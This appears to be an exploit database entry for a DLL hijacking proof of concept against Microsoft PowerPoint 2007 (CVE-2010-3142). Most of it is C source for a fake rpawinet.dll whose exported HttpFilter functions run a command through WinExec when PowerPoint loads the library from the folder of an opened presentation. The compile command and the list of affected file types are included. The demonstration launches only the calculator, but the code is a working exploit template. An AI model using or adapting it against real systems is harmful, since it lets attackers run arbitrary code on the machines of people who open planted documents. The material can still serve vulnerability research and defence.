Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking

Author: storm
type: local
platform: windows
port: 
date_added: 2010-08-25  
date_updated: 2010-08-25  
verified: 0  
codes: CVE-2010-3142;CVE-2010-3141;OSVDB-67483  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 14782.c  

/*

Exploit Title: Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version: 2007 (12.0.6535.5002) SP2
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o rpawinet.dll PowerPoint-DLL.c

.odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx files are affected.

*/

#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void HttpFilterBeginningTransaction() { hax(); }
DllExport void HttpFilterClose() { hax(); }
DllExport void HttpFilterOnBlockingOps() { hax(); }
DllExport void HttpFilterOnResponse() { hax(); }
DllExport void HttpFilterOnTransactionComplete() { hax(); }
DllExport void HttpFilterOpen() { hax(); }

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}